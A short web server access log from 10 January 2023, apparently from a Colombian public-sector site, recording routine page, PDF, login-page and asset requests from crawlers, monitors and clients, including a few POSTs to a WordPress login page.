172.22.2.4 - - [10/Jan/2023:05:53:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [10/Jan/2023:05:55:27 -0500] "-" 408 -
172.22.2.4 - - [10/Jan/2023:05:54:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56079
216.245.221.92 - - [10/Jan/2023:05:56:42 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.106 - - [10/Jan/2023:05:56:48 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [10/Jan/2023:05:56:49 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [10/Jan/2023:05:57:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:05:59:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.60 - - [10/Jan/2023:06:00:55 -0500] "GET /BLA/resoluciones/AUTOS%202019/3580.pdf HTTP/1.1" 304 -
66.249.73.127 - - [10/Jan/2023:06:01:10 -0500] "-" 408 -
172.22.2.4 - - [10/Jan/2023:05:59:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
216.245.221.92 - - [10/Jan/2023:06:01:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:06:02:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:06:04:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [10/Jan/2023:06:06:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:06:07:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
66.249.73.127 - - [10/Jan/2023:06:07:15 -0500] "-" 408 -
172.22.2.4 - - [10/Jan/2023:06:05:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.245.221.92 - - [10/Jan/2023:06:11:42 -0500] "HEAD / HTTP/1.1" 200 -
93.182.35.74 - - [10/Jan/2023:06:11:59 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [10/Jan/2023:06:11:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:06:10:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.62 - - [10/Jan/2023:06:13:14 -0500] "GET /BLA/resoluciones/AUTOS%202018/3452.pdf HTTP/1.1" 304 -
172.22.2.4 - - [10/Jan/2023:06:11:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
66.249.73.127 - - [10/Jan/2023:06:13:44 -0500] "-" 408 -
216.245.221.92 - - [10/Jan/2023:06:16:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:06:16:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:06:16:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:06:18:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43624
201.245.192.253 - - [10/Jan/2023:06:18:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43807
172.22.2.4 - - [10/Jan/2023:06:17:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58612
173.252.95.118 - - [10/Jan/2023:06:19:21 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
66.249.73.127 - - [10/Jan/2023:06:19:30 -0500] "-" 408 -
157.55.39.215 - - [10/Jan/2023:06:21:00 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [10/Jan/2023:06:21:42 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.106 - - [10/Jan/2023:06:21:49 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [10/Jan/2023:06:21:50 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
201.245.192.253 - - [10/Jan/2023:06:21:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:06:22:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.107.24 - - [10/Jan/2023:06:24:34 -0500] "GET /secretaria-de-ambiente-y-universidad-de-la-salle-firman-acuerdo-de-conservacion-en-17-hectareas.html HTTP/1.1" 206 990
172.22.2.4 - - [10/Jan/2023:06:23:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
186.84.88.155 - - [10/Jan/2023:06:24:58 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12178
186.84.88.155 - - [10/Jan/2023:06:24:58 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
186.84.88.155 - - [10/Jan/2023:06:24:58 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
186.84.88.155 - - [10/Jan/2023:06:24:58 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
186.84.88.155 - - [10/Jan/2023:06:24:58 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
186.84.88.155 - - [10/Jan/2023:06:24:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.155 - - [10/Jan/2023:06:24:58 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.88.155 - - [10/Jan/2023:06:24:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.155 - - [10/Jan/2023:06:24:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.155 - - [10/Jan/2023:06:24:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.155 - - [10/Jan/2023:06:24:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.155 - - [10/Jan/2023:06:24:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.155 - - [10/Jan/2023:06:24:58 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
186.84.88.155 - - [10/Jan/2023:06:24:58 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
186.84.88.155 - - [10/Jan/2023:06:24:58 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
